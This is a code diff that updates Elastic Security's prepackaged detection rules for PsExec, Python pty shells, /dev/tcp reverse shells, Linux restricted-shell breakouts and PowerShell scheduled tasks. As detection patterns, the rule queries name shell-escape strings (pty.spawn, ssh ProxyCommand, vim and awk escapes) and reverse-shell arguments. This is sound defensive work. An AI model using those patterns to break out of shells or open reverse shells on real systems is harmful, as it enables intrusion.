@@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json index 5f42ac26da140..45d1f19a9e3c6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json @@ -15,7 +15,40 @@ "language": "eql", "license": "Elastic License v2", "name": "PsExec Network Connection", - "query": "sequence by process.entity_id\n [process where process.name : \"PsExec.exe\" and event.type == \"start\"]\n [network where process.name : \"PsExec.exe\"]\n", + "note": "## Triage and analysis\n\n### Investigating PsExec Network Connection\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges\non Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators,\nPsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and\nbypass security protections.\n\nThis rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the\nutility, followed by a network connection done by the process.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for\nsimilar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the\nuser or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize accordingly with the role of the servers and users involved.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where process.name : \"PsExec.exe\" and event.type == \"start\" and\n\n /* This flag suppresses the display of the license dialog and may\n indicate that psexec executed for the first time in the machine */\n process.args : \"-accepteula\" and\n\n not process.executable : (\"?:\\\\ProgramData\\\\Docusnap\\\\Discovery\\\\discovery\\\\plugins\\\\17\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Docusnap 11\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Tools\\\\dsDNS.exe\") and\n not process.parent.executable : \"?:\\\\Program Files (x86)\\\\Cynet\\\\Cynet Scanner\\\\CynetScanner.exe\"]\n [network where process.name : \"PsExec.exe\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "55d551c6-333b-4665-ab7e-5d14a59715ce", "severity": "low", @@ -60,5 +93,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json index 2fb8886ffb543..6bb64d220d8f9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", "query": "event.category:process and event.type:(start or process_started) and \n process.name:python* and\n process.args:(\"import pty; pty.spawn(\\\"/bin/sh\\\")\" or\n \"import pty; pty.spawn(\\\"/bin/dash\\\")\" or\n \"import pty; pty.spawn(\\\"/bin/bash\\\")\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d76b02ef-fc95-4001-9297-01cb7412232f", "severity": "high", @@ -43,5 +65,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "query", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json index 3097bad9256ad..59d609484b64f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json @@ -19,6 +19,53 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa", "severity": "low", @@ -49,7 +96,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -63,5 +110,5 @@ } ], "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json index 7f9805799c879..5a8be5eb012e8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json @@ -11,15 +11,53 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell Activity via Terminal", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args:(\"*/dev/tcp/*\", \"*/dev/udp/*\", \"zsh/net/tcp\", \"zsh/net/udp\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args : (\"*/dev/tcp/*\", \"*/dev/udp/*\", \"*zsh/net/tcp*\", \"*zsh/net/udp*\") and\n\n /* noisy FPs */\n not (process.parent.name : \"timeout\" and process.executable : \"/var/lib/docker/overlay*\") and\n not process.command_line : (\"*/dev/tcp/sirh_db/*\", \"*/dev/tcp/remoteiot.com/*\", \"*dev/tcp/elk.stag.one/*\", \"*dev/tcp/kafka/*\", \"*/dev/tcp/$0/$1*\", \"*/dev/tcp/127.*\", \"*/dev/udp/127.*\", \"*/dev/tcp/localhost/*\") and\n not process.parent.command_line : \"runc init\"\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", "https://github.com/WangYihang/Reverse-Shell-Manager", "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json index 84fd67fa7e037..feb3c0918ff0e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json @@ -15,10 +15,57 @@ "language": "eql", "license": "Elastic License v2", "name": "Outbound Scheduled Task Activity via PowerShell", - "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [library where dll.name : \"taskschd.dll\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", "severity": "medium", @@ -54,5 +101,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json index 62990c9a4b342..d48fed87a043b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json @@ -15,6 +15,23 @@ "references": [ "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965", "severity": "medium", @@ -43,5 +60,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json index 74a70eb7ebd93..3fc89d1e274eb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json @@ -16,6 +16,33 @@ "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "47f76567-d58a-4fed-b32b-21f571e28910", "severity": "medium", @@ -39,7 +66,14 @@ { "id": "T1059", "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/" + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] } ] }, @@ -60,5 +94,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json index 27fed16285827..f8a0afbe93765 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution via local SxS Shared Module", - "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.", "query": "file where file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", "references": [ "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json index 1715625e020b1..5e8c0c31f6bb4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json @@ -10,8 +10,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe session view analysis for the command alerted is avalible in versions 8.2 and above.\n", - "query": "process where event.type == \"start\" and\n\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type == \"start\" and\n\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -39,8 +39,41 @@ "https://gtfobins.github.io/gtfobins/git/", "https://gtfobins.github.io/gtfobins/ftp/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "52376a86-ee86-4967-97ae-1a05f55816f0", + "setup": "The session view analysis for the command alerted is avalible in versions 8.2 and above.", "severity": "medium", "tags": [ "Elastic", @@ -76,5 +109,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json index 6399e3f2031fd..30498292b8f4b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json @@ -16,6 +16,38 @@ "https://developer.apple.com/library/archive/technotes/tn2065/_index.html", "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 